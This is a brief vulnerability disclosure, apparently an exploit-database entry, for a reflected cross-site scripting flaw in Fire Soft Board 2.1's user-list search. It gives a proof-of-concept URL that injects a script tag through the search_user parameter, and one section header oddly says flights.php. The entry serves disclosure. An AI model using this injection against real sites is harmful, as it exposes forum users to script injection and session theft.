# Exploit Title: FSB(Fire Soft Board)2 - Reflected Cross Site Scripting(index.php)
# Date: 2016-06-10
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: http://www.fire-soft-board.com/
# Software Link: https://github.com/FSB/Fire-Soft-Board-2/archive/dev.zip
# Version: 2.1
# Tested on: Debian [wheezy]
# CVE : none

### Vulnerability Details #####################################################
# No filter for the search results
#
###############################################################################

### XSS1 - flights.php

Attack Code
http://127.0.0.1/vul_test/Fire-Soft-Board-2/index.php?p=userlist&g_id=4
&order=u_total_post&direction=DESC&search_user="><script>alert(45)</script>
&limit=30&like=&module=2&page=1

weak parameters
 - search_user
###############################################################################